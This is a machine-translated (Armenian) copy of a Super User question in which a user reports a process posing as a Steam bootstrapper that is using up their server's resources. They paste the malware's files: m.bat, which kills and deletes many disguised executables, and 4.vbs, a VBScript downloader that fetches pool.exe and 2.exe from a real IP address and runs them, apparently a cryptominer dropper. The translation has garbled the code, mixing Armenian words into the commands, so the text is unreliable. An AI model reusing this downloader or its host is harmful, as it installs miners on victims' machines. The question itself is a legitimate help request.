• Главная
    • /
  • Блог
    • /
  • Windows - Ինչպես մշտապես սպանել Գոլորշի հաճախորդի bootstrapper - Super User

Windows - Ինչպես մշտապես սպանել Գոլորշի հաճախորդի bootstrapper - Super User

Իմ առաջադրանքի կառավարչում հետեւյալ իրավիճակը ես ունեմ:

Իմ առաջադրանքի կառավարչում հետեւյալ իրավիճակը ես ունեմ:

Չգիտեմ, թե ինչպիսի ծրագիր է դա, բայց հաստատ չէ Steam- ի հաճախորդի սկավառակակիրը, քանի որ չեմ տեղադրել այն եւ չի կարողանում տեղահանել:

Եթե ​​փորձեմ հասկանալ, թե ինչպիսի ծրագիր է դա այս քայլով.

Ես նման բան եմ տեսնում:

MS Config կոմունալում ես գտա ոչինչ, որը կարծես secury.exe- ն է:

Երբ ես բացում եմ ֆայլի վայրը, ես տեսնում եմ երեք ֆայլ:

m.bat, b.exe, 4.vbs:

Ստորեւ բերվում է m.bat- ի բովանդակությունը:

taskkill / f / t / im secury.exe ֆայլը: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe խնդիրն / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe ֆայլի վերանորոգում գործիքներ taskkill / f / t / im / ap / f / t / im shovsts.exe խնդիրն / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im Հիմնականացված TrustedInstaller.exe ֆայլը C: \ Windows \ System32 \ soiuos.exe del C: \ ProgramData \ explor0rer.exe ֆայլը C: \ ProgramData \ ieplare.exe ֆայլի C: \ ProgramData \ nssm.exe ֆայլը C: \ ProgramData \ kingsoft.exe: ProgramData \ MSASCui.exe ֆայլը C: \ Pro C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe ֆայլի C: \ ProgramData \ WindowsUpgrade.exe ֆայլը C: \ ProgramData \ msdc.exe: C: \ ProgramData \ apkls.exe ֆայլը C: \ ProgramData \ Fiddlere.exe ֆայլի C: \ ProgramData \ shovst.exe ֆայլը C: \ ProgramData \ lqrtqe.exe ֆայլը C: \ ProgramData \ winlog.exe C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe ֆայլը C: \ ProgramData \ shovsts.exe ֆայլը C: \ ProgramData \ fcty.exe C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe

Հաջորդը գնում է 4.vbs:

Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Սահմանել sGet = CreateObject ("ADODB.Stream" sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile «c: \ ProgramData \ s2.exe», 2 Սահմանել xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Սահմանել sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"): Run "C: \ ProgramData \ pool3.exe" CreateObject "WScript.Shell"): Run "del C: \ ProgramData \ pool3.exe"

Ինչ կարող եմ անել, որպեսզի secury.exe- ն չկիրառի իմ սերվերի հաշվարկային լիազորությունները:

Հ.Գ. Ես համակարգիչը լիովին ստուգել եմ Avast- ին, բայց ոչ մի սխալ բան չի գտել: